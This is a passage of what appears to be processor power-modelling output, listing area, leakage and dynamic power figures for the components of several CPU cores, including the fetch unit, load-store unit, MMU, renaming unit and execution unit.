'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage': 0.000932505,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage with power gating': 0.000494733,
'Instruction Fetch Unit/Branch Predictor/Runtime Dynamic': 0.00607694,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage': 0.0199703,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage with power gating': 0.0103282,
'Instruction Fetch Unit/Branch Target Buffer/Area': 0.64954,
'Instruction Fetch Unit/Branch Target Buffer/Gate Leakage': 0.00272758,
'Instruction Fetch Unit/Branch Target Buffer/Peak Dynamic': 0.177867,
'Instruction Fetch Unit/Branch Target Buffer/Runtime Dynamic': 0.0108002,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage': 0.0811682,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage with power gating': 0.0435357,
'Instruction Fetch Unit/Gate Leakage': 0.0590479,
'Instruction Fetch Unit/Instruction Buffer/Area': 0.0226323,
'Instruction Fetch Unit/Instruction Buffer/Gate Leakage': 6.83558e-05,
'Instruction Fetch Unit/Instruction Buffer/Peak Dynamic': 0.606827,
'Instruction Fetch Unit/Instruction Buffer/Runtime Dynamic': 0.187795,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage': 0.00151885,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage with power gating': 0.000701682,
'Instruction Fetch Unit/Instruction Cache/Area': 3.14635,
'Instruction Fetch Unit/Instruction Cache/Gate Leakage': 0.029931,
'Instruction Fetch Unit/Instruction Cache/Peak Dynamic': 6.43323,
'Instruction Fetch Unit/Instruction Cache/Runtime Dynamic': 0.387106,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage': 0.367022,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage with power gating': 0.180386,
'Instruction Fetch Unit/Instruction Decoder/Area': 1.85799,
'Instruction Fetch Unit/Instruction Decoder/Gate Leakage': 0.0222493,
'Instruction Fetch Unit/Instruction Decoder/Peak Dynamic': 1.37404,
'Instruction Fetch Unit/Instruction Decoder/Runtime Dynamic': 0.637835,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage': 0.442943,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage with power gating': 0.166104,
'Instruction Fetch Unit/Peak Dynamic': 8.96874,
'Instruction Fetch Unit/Runtime Dynamic': 1.22961,
'Instruction Fetch Unit/Subthreshold Leakage': 0.932587,
'Instruction Fetch Unit/Subthreshold Leakage with power gating': 0.408542,
'L2/Area': 4.53318,
'L2/Gate Leakage': 0.015464,
'L2/Peak Dynamic': 0.0676826,
'L2/Runtime Dynamic': 0.0135037,
'L2/Subthreshold Leakage': 0.834142,
'L2/Subthreshold Leakage with power gating': 0.401066,
'Load Store Unit/Area': 8.80969,
'Load Store Unit/Data Cache/Area': 6.84535,
'Load Store Unit/Data Cache/Gate Leakage': 0.0279261,
'Load Store Unit/Data Cache/Peak Dynamic': 6.47358,
'Load Store Unit/Data Cache/Runtime Dynamic': 2.51904,
'Load Store Unit/Data Cache/Subthreshold Leakage': 0.527675,
'Load Store Unit/Data Cache/Subthreshold Leakage with power gating': 0.25085,
'Load Store Unit/Gate Leakage': 0.0351387,
'Load Store Unit/LoadQ/Area': 0.0836782,
'Load Store Unit/LoadQ/Gate Leakage': 0.00059896,
'Load Store Unit/LoadQ/Peak Dynamic': 0.169412,
'Load Store Unit/LoadQ/Runtime Dynamic': 0.169412,
'Load Store Unit/LoadQ/Subthreshold Leakage': 0.00941961,
'Load Store Unit/LoadQ/Subthreshold Leakage with power gating': 0.00536918,
'Load Store Unit/Peak Dynamic': 7.27684,
'Load Store Unit/Runtime Dynamic': 3.52393,
'Load Store Unit/StoreQ/Area': 0.322079,
'Load Store Unit/StoreQ/Gate Leakage': 0.00329971,
'Load Store Unit/StoreQ/Peak Dynamic': 0.417741,
'Load Store Unit/StoreQ/Runtime Dynamic': 0.835482,
'Load Store Unit/StoreQ/Subthreshold Leakage': 0.0345621,
'Load Store Unit/StoreQ/Subthreshold Leakage with power gating': 0.0197004,
'Load Store Unit/Subthreshold Leakage': 0.591622,
'Load Store Unit/Subthreshold Leakage with power gating': 0.283406,
'Memory Management Unit/Area': 0.434579,
'Memory Management Unit/Dtlb/Area': 0.0879726,
'Memory Management Unit/Dtlb/Gate Leakage': 0.00088729,
'Memory Management Unit/Dtlb/Peak Dynamic': 0.148258,
'Memory Management Unit/Dtlb/Runtime Dynamic': 0.149268,
'Memory Management Unit/Dtlb/Subthreshold Leakage': 0.0155699,
'Memory Management Unit/Dtlb/Subthreshold Leakage with power gating': 0.00887485,
'Memory Management Unit/Gate Leakage': 0.00813591,
'Memory Management Unit/Itlb/Area': 0.301552,
'Memory Management Unit/Itlb/Gate Leakage': 0.00393464,
'Memory Management Unit/Itlb/Peak Dynamic': 0.399995,
'Memory Management Unit/Itlb/Runtime Dynamic': 0.063478,
'Memory Management Unit/Itlb/Subthreshold Leakage': 0.0413758,
'Memory Management Unit/Itlb/Subthreshold Leakage with power gating': 0.0235842,
'Memory Management Unit/Peak Dynamic': 0.814803,
'Memory Management Unit/Runtime Dynamic': 0.212746,
'Memory Management Unit/Subthreshold Leakage': 0.0769113,
'Memory Management Unit/Subthreshold Leakage with power gating': 0.0399462,
'Peak Dynamic': 30.5326,
'Renaming Unit/Area': 0.369768,
'Renaming Unit/FP Front End RAT/Area': 0.168486,
'Renaming Unit/FP Front End RAT/Gate Leakage': 0.00489731,
'Renaming Unit/FP Front End RAT/Peak Dynamic': 3.33511,
'Renaming Unit/FP Front End RAT/Runtime Dynamic': 1.14726,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage': 0.0437281,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage with power gating': 0.024925,
'Renaming Unit/Free List/Area': 0.0414755,
'Renaming Unit/Free List/Gate Leakage': 4.15911e-05,
'Renaming Unit/Free List/Peak Dynamic': 0.0401324,
'Renaming Unit/Free List/Runtime Dynamic': 0.0510646,
'Renaming Unit/Free List/Subthreshold Leakage': 0.000670426,
'Renaming Unit/Free List/Subthreshold Leakage with power gating': 0.000377987,
'Renaming Unit/Gate Leakage': 0.00863632,
'Renaming Unit/Int Front End RAT/Area': 0.114751,
'Renaming Unit/Int Front End RAT/Gate Leakage': 0.00038343,
'Renaming Unit/Int Front End RAT/Peak Dynamic': 0.86945,
'Renaming Unit/Int Front End RAT/Runtime Dynamic': 0.358373,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage': 0.00611897,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage with power gating': 0.00348781,
'Renaming Unit/Peak Dynamic': 4.56169,
'Renaming Unit/Runtime Dynamic': 1.5567,
'Renaming Unit/Subthreshold Leakage': 0.070483,
'Renaming Unit/Subthreshold Leakage with power gating': 0.0362779,
'Runtime Dynamic': 12.1248,
'Subthreshold Leakage': 6.21877,
'Subthreshold Leakage with power gating': 2.58311},
{'Area': 32.0201,
'Execution Unit/Area': 7.68434,
'Execution Unit/Complex ALUs/Area': 0.235435,
'Execution Unit/Complex ALUs/Gate Leakage': 0.0132646,
'Execution Unit/Complex ALUs/Peak Dynamic': 2.83407e-06,
'Execution Unit/Complex ALUs/Runtime Dynamic': 0.202691,
'Execution Unit/Complex ALUs/Subthreshold Leakage': 0.20111,
'Execution Unit/Complex ALUs/Subthreshold Leakage with power gating': 0.0754163,
'Execution Unit/Floating Point Units/Area': 4.6585,
'Execution Unit/Floating Point Units/Gate Leakage': 0.0656156,
'Execution Unit/Floating Point Units/Peak Dynamic': 1.01201e-05,
'Execution Unit/Floating Point Units/Runtime Dynamic': 0.304033,
'Execution Unit/Floating Point Units/Subthreshold Leakage': 0.994829,
'Execution Unit/Floating Point Units/Subthreshold Leakage with power gating': 0.373061,
'Execution Unit/Gate Leakage': 0.120359,
'Execution Unit/Instruction Scheduler/Area': 1.66526,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Area': 0.275653,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Gate Leakage': 0.000977433,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Peak Dynamic': 1.04181,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Runtime Dynamic': 0.154568,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage': 0.0143453,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage with power gating': 0.00810519,
'Execution Unit/Instruction Scheduler/Gate Leakage': 0.00568913,
'Execution Unit/Instruction Scheduler/Instruction Window/Area': 0.805223,
'Execution Unit/Instruction Scheduler/Instruction Window/Gate Leakage': 0.00414562,
'Execution Unit/Instruction Scheduler/Instruction Window/Peak Dynamic': 1.6763,
'Execution Unit/Instruction Scheduler/Instruction Window/Runtime Dynamic': 0.249312,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage': 0.0625755,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage with power gating': 0.0355964,
'Execution Unit/Instruction Scheduler/Peak Dynamic': 3.82262,
'Execution Unit/Instruction Scheduler/ROB/Area': 0.584388,
'Execution Unit/Instruction Scheduler/ROB/Gate Leakage': 0.00056608,
'Execution Unit/Instruction Scheduler/ROB/Peak Dynamic': 1.10451,
'Execution Unit/Instruction Scheduler/ROB/Runtime Dynamic': 0.125844,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage': 0.00906853,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage with power gating': 0.00364446,
'Execution Unit/Instruction Scheduler/Runtime Dynamic': 0.529725,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage': 0.0859892,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage with power gating': 0.047346,
'Execution Unit/Integer ALUs/Area': 0.47087,
'Execution Unit/Integer ALUs/Gate Leakage': 0.0265291,
'Execution Unit/Integer ALUs/Peak Dynamic': 0.176778,
'Execution Unit/Integer ALUs/Runtime Dynamic': 0.101344,
'Execution Unit/Integer ALUs/Subthreshold Leakage': 0.40222,
'Execution Unit/Integer ALUs/Subthreshold Leakage with power gating': 0.150833,
'Execution Unit/Peak Dynamic': 4.16878,
'Execution Unit/Register Files/Area': 0.570804,
'Execution Unit/Register Files/Floating Point RF/Area': 0.208131,
'Execution Unit/Register Files/Floating Point RF/Gate Leakage': 0.000232788,
'Execution Unit/Register Files/Floating Point RF/Peak Dynamic': 1.91191e-06,
'Execution Unit/Register Files/Floating Point RF/Runtime Dynamic': 0.00648327,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage': 0.00399698,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage with power gating': 0.00176968,
'Execution Unit/Register Files/Gate Leakage': 0.000622708,
'Execution Unit/Register Files/Integer RF/Area': 0.362673,
'Execution Unit/Register Files/Integer RF/Gate Leakage': 0.00038992,
'Execution Unit/Register Files/Integer RF/Peak Dynamic': 0.0468833,
'Execution Unit/Register Files/Integer RF/Runtime Dynamic': 0.0479478,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage': 0.00614175,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage with power gating': 0.00246675,
'Execution Unit/Register Files/Peak Dynamic': 0.0468852,
'Execution Unit/Register Files/Runtime Dynamic': 0.054431,
'Execution Unit/Register Files/Subthreshold Leakage': 0.0101387,
'Execution Unit/Register Files/Subthreshold Leakage with power gating': 0.00423643,
'Execution Unit/Results Broadcast Bus/Area Overhead': 0.0390912,
'Execution Unit/Results Broadcast Bus/Gate Leakage': 0.00537402,
'Execution Unit/Results Broadcast Bus/Peak Dynamic': 0.0987706,
'Execution Unit/Results Broadcast Bus/Runtime Dynamic': 0.253717,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage': 0.081478,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage with power gating': 0.0305543,
'Execution Unit/Runtime Dynamic': 1.44594,
'Execution Unit/Subthreshold Leakage': 1.79543,
'Execution Unit/Subthreshold Leakage with power gating': 0.688821,
'Gate Leakage': 0.368936,
'Instruction Fetch Unit/Area': 5.85939,
'Instruction Fetch Unit/Branch Predictor/Area': 0.138516,
'Instruction Fetch Unit/Branch Predictor/Chooser/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Chooser/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Chooser/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Chooser/Runtime Dynamic': 0.00222979,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/Gate Leakage': 0.000757657,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Runtime Dynamic': 0.00222979,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Area': 0.0257064,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Gate Leakage': 0.000154548,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Peak Dynamic': 0.0142575,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Runtime Dynamic': 0.00200626,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage': 0.00384344,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage with power gating': 0.00198631,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Area': 0.0151917,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Gate Leakage': 8.00196e-05,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Peak Dynamic': 0.00527447,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Runtime Dynamic': 0.000811718,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage': 0.00181347,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage with power gating': 0.000957045,
'Instruction Fetch Unit/Branch Predictor/Peak Dynamic': 0.0597838,
'Instruction Fetch Unit/Branch Predictor/RAS/Area': 0.0105732,
'Instruction Fetch Unit/Branch Predictor/RAS/Gate Leakage': 4.63858e-05,
'Instruction Fetch Unit/Branch Predictor/RAS/Peak Dynamic': 0.0117602,
'Instruction Fetch Unit/Branch Predictor/RAS/Runtime Dynamic': 0.000688773,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage': 0.000932505,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage with power gating': 0.000494733,
'Instruction Fetch Unit/Branch Predictor/Runtime Dynamic': 0.00715461,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage': 0.0199703,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage with power gating': 0.0103282,
'Instruction Fetch Unit/Branch Target Buffer/Area': 0.64954,
'Instruction Fetch Unit/Branch Target Buffer/Gate Leakage': 0.00272758,
'Instruction Fetch Unit/Branch Target Buffer/Peak Dynamic': 0.177867,
'Instruction Fetch Unit/Branch Target Buffer/Runtime Dynamic': 0.0190885,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage': 0.0811682,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage with power gating': 0.0435357,
'Instruction Fetch Unit/Gate Leakage': 0.0589979,
'Instruction Fetch Unit/Instruction Buffer/Area': 0.0226323,
'Instruction Fetch Unit/Instruction Buffer/Gate Leakage': 6.83558e-05,
'Instruction Fetch Unit/Instruction Buffer/Peak Dynamic': 0.606827,
'Instruction Fetch Unit/Instruction Buffer/Runtime Dynamic': 0.0460934,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage': 0.00151885,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage with power gating': 0.000701682,
'Instruction Fetch Unit/Instruction Cache/Area': 3.14635,
'Instruction Fetch Unit/Instruction Cache/Gate Leakage': 0.029931,
'Instruction Fetch Unit/Instruction Cache/Peak Dynamic': 2.93194,
'Instruction Fetch Unit/Instruction Cache/Runtime Dynamic': 0.173486,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage': 0.367022,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage with power gating': 0.180386,
'Instruction Fetch Unit/Instruction Decoder/Area': 1.85799,
'Instruction Fetch Unit/Instruction Decoder/Gate Leakage': 0.0222493,
'Instruction Fetch Unit/Instruction Decoder/Peak Dynamic': 1.37404,
'Instruction Fetch Unit/Instruction Decoder/Runtime Dynamic': 0.156554,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage': 0.442943,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage with power gating': 0.166104,
'Instruction Fetch Unit/Peak Dynamic': 5.29275,
'Instruction Fetch Unit/Runtime Dynamic': 0.402376,
'Instruction Fetch Unit/Subthreshold Leakage': 0.932286,
'Instruction Fetch Unit/Subthreshold Leakage with power gating': 0.40843,
'L2/Area': 4.53318,
'L2/Gate Leakage': 0.015464,
'L2/Peak Dynamic': 0.0356709,
'L2/Runtime Dynamic': 0.0080202,
'L2/Subthreshold Leakage': 0.834142,
'L2/Subthreshold Leakage with power gating': 0.401066,
'Load Store Unit/Area': 8.80901,
'Load Store Unit/Data Cache/Area': 6.84535,
'Load Store Unit/Data Cache/Gate Leakage': 0.0279261,
'Load Store Unit/Data Cache/Peak Dynamic': 2.63095,
'Load Store Unit/Data Cache/Runtime Dynamic': 0.680792,
'Load Store Unit/Data Cache/Subthreshold Leakage': 0.527675,
'Load Store Unit/Data Cache/Subthreshold Leakage with power gating': 0.25085,
'Load Store Unit/Gate Leakage': 0.0350888,
'Load Store Unit/LoadQ/Area': 0.0836782,
'Load Store Unit/LoadQ/Gate Leakage': 0.00059896,
'Load Store Unit/LoadQ/Peak Dynamic': 0.0450938,
'Load Store Unit/LoadQ/Runtime Dynamic': 0.0450937,
'Load Store Unit/LoadQ/Subthreshold Leakage': 0.00941961,
'Load Store Unit/LoadQ/Subthreshold Leakage with power gating': 0.00536918,
'Load Store Unit/Peak Dynamic': 2.84389,
'Load Store Unit/Runtime Dynamic': 0.948273,
'Load Store Unit/StoreQ/Area': 0.322079,
'Load Store Unit/StoreQ/Gate Leakage': 0.00329971,
'Load Store Unit/StoreQ/Peak Dynamic': 0.111194,
'Load Store Unit/StoreQ/Runtime Dynamic': 0.222387,
'Load Store Unit/StoreQ/Subthreshold Leakage': 0.0345621,
'Load Store Unit/StoreQ/Subthreshold Leakage with power gating': 0.0197004,
'Load Store Unit/Subthreshold Leakage': 0.591321,
'Load Store Unit/Subthreshold Leakage with power gating': 0.283293,
'Memory Management Unit/Area': 0.4339,
'Memory Management Unit/Dtlb/Area': 0.0879726,
'Memory Management Unit/Dtlb/Gate Leakage': 0.00088729,
'Memory Management Unit/Dtlb/Peak Dynamic': 0.0394629,
'Memory Management Unit/Dtlb/Runtime Dynamic': 0.0398514,
'Memory Management Unit/Dtlb/Subthreshold Leakage': 0.0155699,
'Memory Management Unit/Dtlb/Subthreshold Leakage with power gating': 0.00887485,
'Memory Management Unit/Gate Leakage': 0.00808595,
'Memory Management Unit/Itlb/Area': 0.301552,
'Memory Management Unit/Itlb/Gate Leakage': 0.00393464,
'Memory Management Unit/Itlb/Peak Dynamic': 0.182297,
'Memory Management Unit/Itlb/Runtime Dynamic': 0.0288764,
'Memory Management Unit/Itlb/Subthreshold Leakage': 0.0413758,
'Memory Management Unit/Itlb/Subthreshold Leakage with power gating': 0.0235842,
'Memory Management Unit/Peak Dynamic': 0.406196,
'Memory Management Unit/Runtime Dynamic': 0.0687278,
'Memory Management Unit/Subthreshold Leakage': 0.0766103,
'Memory Management Unit/Subthreshold Leakage with power gating': 0.0398333,
'Peak Dynamic': 16.3368,
'Renaming Unit/Area': 0.303608,
'Renaming Unit/FP Front End RAT/Area': 0.131045,
'Renaming Unit/FP Front End RAT/Gate Leakage': 0.00351123,
'Renaming Unit/FP Front End RAT/Peak Dynamic': 2.51468,
'Renaming Unit/FP Front End RAT/Runtime Dynamic': 4.96768e-06,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage': 0.0308571,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage with power gating': 0.0175885,
'Renaming Unit/Free List/Area': 0.0340654,
'Renaming Unit/Free List/Gate Leakage': 2.5481e-05,
'Renaming Unit/Free List/Peak Dynamic': 0.0306032,
'Renaming Unit/Free List/Runtime Dynamic': 0.00697374,
'Renaming Unit/Free List/Subthreshold Leakage': 0.000370144,
'Renaming Unit/Free List/Subthreshold Leakage with power gating': 0.000201064,
'Renaming Unit/Gate Leakage': 0.00708398,
'Renaming Unit/Int Front End RAT/Area': 0.0941223,
'Renaming Unit/Int Front End RAT/Gate Leakage': 0.000283242,
'Renaming Unit/Int Front End RAT/Peak Dynamic': 0.731965,
'Renaming Unit/Int Front End RAT/Runtime Dynamic': 0.0784063,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage': 0.00435488,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage with power gating': 0.00248228,
'Renaming Unit/Peak Dynamic': 3.58947,
'Renaming Unit/Runtime Dynamic': 0.085385,
'Renaming Unit/Subthreshold Leakage': 0.0552466,
'Renaming Unit/Subthreshold Leakage with power gating': 0.0276461,
'Runtime Dynamic': 2.95872,
'Subthreshold Leakage': 6.16288,
'Subthreshold Leakage with power gating': 2.55328},
{'Area': 32.0201,
'Execution Unit/Area': 7.68434,
'Execution Unit/Complex ALUs/Area': 0.235435,
'Execution Unit/Complex ALUs/Gate Leakage': 0.0132646,
'Execution Unit/Complex ALUs/Peak Dynamic': 0.0497804,
'Execution Unit/Complex ALUs/Runtime Dynamic': 0.241788,
'Execution Unit/Complex ALUs/Subthreshold Leakage': 0.20111,
'Execution Unit/Complex ALUs/Subthreshold Leakage with power gating': 0.0754163,
'Execution Unit/Floating Point Units/Area': 4.6585,
'Execution Unit/Floating Point Units/Gate Leakage': 0.0656156,
'Execution Unit/Floating Point Units/Peak Dynamic': 0.266638,
'Execution Unit/Floating Point Units/Runtime Dynamic': 0.304033,
'Execution Unit/Floating Point Units/Subthreshold Leakage': 0.994829,
'Execution Unit/Floating Point Units/Subthreshold Leakage with power gating': 0.373061,
'Execution Unit/Gate Leakage': 0.120359,
'Execution Unit/Instruction Scheduler/Area': 1.66526,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Area': 0.275653,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Gate Leakage': 0.000977433,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Peak Dynamic': 1.04181,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Runtime Dynamic': 0.115969,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage': 0.0143453,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage with power gating': 0.00810519,
'Execution Unit/Instruction Scheduler/Gate Leakage': 0.00568913,
'Execution Unit/Instruction Scheduler/Instruction Window/Area': 0.805223,
'Execution Unit/Instruction Scheduler/Instruction Window/Gate Leakage': 0.00414562,
'Execution Unit/Instruction Scheduler/Instruction Window/Peak Dynamic': 1.6763,
'Execution Unit/Instruction Scheduler/Instruction Window/Runtime Dynamic': 0.187054,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage': 0.0625755,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage with power gating': 0.0355964,
'Execution Unit/Instruction Scheduler/Peak Dynamic': 3.82262,
'Execution Unit/Instruction Scheduler/ROB/Area': 0.584388,
'Execution Unit/Instruction Scheduler/ROB/Gate Leakage': 0.00056608,
'Execution Unit/Instruction Scheduler/ROB/Peak Dynamic': 1.10451,
'Execution Unit/Instruction Scheduler/ROB/Runtime Dynamic': 0.0944185,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage': 0.00906853,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage with power gating': 0.00364446,
'Execution Unit/Instruction Scheduler/Runtime Dynamic': 0.397441,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage': 0.0859892,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage with power gating': 0.047346,
'Execution Unit/Integer ALUs/Area': 0.47087,
'Execution Unit/Integer ALUs/Gate Leakage': 0.0265291,
'Execution Unit/Integer ALUs/Peak Dynamic': 0.0917557,
'Execution Unit/Integer ALUs/Runtime Dynamic': 0.101344,
'Execution Unit/Integer ALUs/Subthreshold Leakage': 0.40222,
'Execution Unit/Integer ALUs/Subthreshold Leakage with power gating': 0.150833,
'Execution Unit/Peak Dynamic': 4.47338,
'Execution Unit/Register Files/Area': 0.570804,
'Execution Unit/Register Files/Floating Point RF/Area': 0.208131,
'Execution Unit/Register Files/Floating Point RF/Gate Leakage': 0.000232788,
'Execution Unit/Register Files/Floating Point RF/Peak Dynamic': 0.0503736,
'Execution Unit/Register Files/Floating Point RF/Runtime Dynamic': 0.00486426,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage': 0.00399698,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage with power gating': 0.00176968,
'Execution Unit/Register Files/Gate Leakage': 0.000622708,
'Execution Unit/Register Files/Integer RF/Area': 0.362673,
'Execution Unit/Register Files/Integer RF/Gate Leakage': 0.00038992,
'Execution Unit/Register Files/Integer RF/Peak Dynamic': 0.0539008,
'Execution Unit/Register Files/Integer RF/Runtime Dynamic': 0.0359742,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage': 0.00614175,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage with power gating': 0.00246675,
'Execution Unit/Register Files/Peak Dynamic': 0.104274,
'Execution Unit/Register Files/Runtime Dynamic': 0.0408385,
'Execution Unit/Register Files/Subthreshold Leakage': 0.0101387,
'Execution Unit/Register Files/Subthreshold Leakage with power gating': 0.00423643,
'Execution Unit/Results Broadcast Bus/Area Overhead': 0.0390912,
'Execution Unit/Results Broadcast Bus/Gate Leakage': 0.00537402,
'Execution Unit/Results Broadcast Bus/Peak Dynamic': 0.126002,
'Execution Unit/Results Broadcast Bus/Runtime Dynamic': 0.313117,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage': 0.081478,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage with power gating': 0.0305543,
'Execution Unit/Runtime Dynamic': 1.39856,
'Execution Unit/Subthreshold Leakage': 1.79543,
'Execution Unit/Subthreshold Leakage with power gating': 0.688821,
'Gate Leakage': 0.368936,
'Instruction Fetch Unit/Area': 5.85939,
'Instruction Fetch Unit/Branch Predictor/Area': 0.138516,
'Instruction Fetch Unit/Branch Predictor/Chooser/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Chooser/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Chooser/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Chooser/Runtime Dynamic': 0.000352288,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/Gate Leakage': 0.000757657,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Runtime Dynamic': 0.000352288,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Area': 0.0257064,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Gate Leakage': 0.000154548,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Peak Dynamic': 0.0142575,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Runtime Dynamic': 0.000323299,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage': 0.00384344,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage with power gating': 0.00198631,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Area': 0.0151917,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Gate Leakage': 8.00196e-05,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Peak Dynamic': 0.00527447,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Runtime Dynamic': 0.000134155,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage': 0.00181347,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage with power gating': 0.000957045,
'Instruction Fetch Unit/Branch Predictor/Peak Dynamic': 0.0597838,
'Instruction Fetch Unit/Branch Predictor/RAS/Area': 0.0105732,
'Instruction Fetch Unit/Branch Predictor/RAS/Gate Leakage': 4.63858e-05,
'Instruction Fetch Unit/Branch Predictor/RAS/Peak Dynamic': 0.0117602,
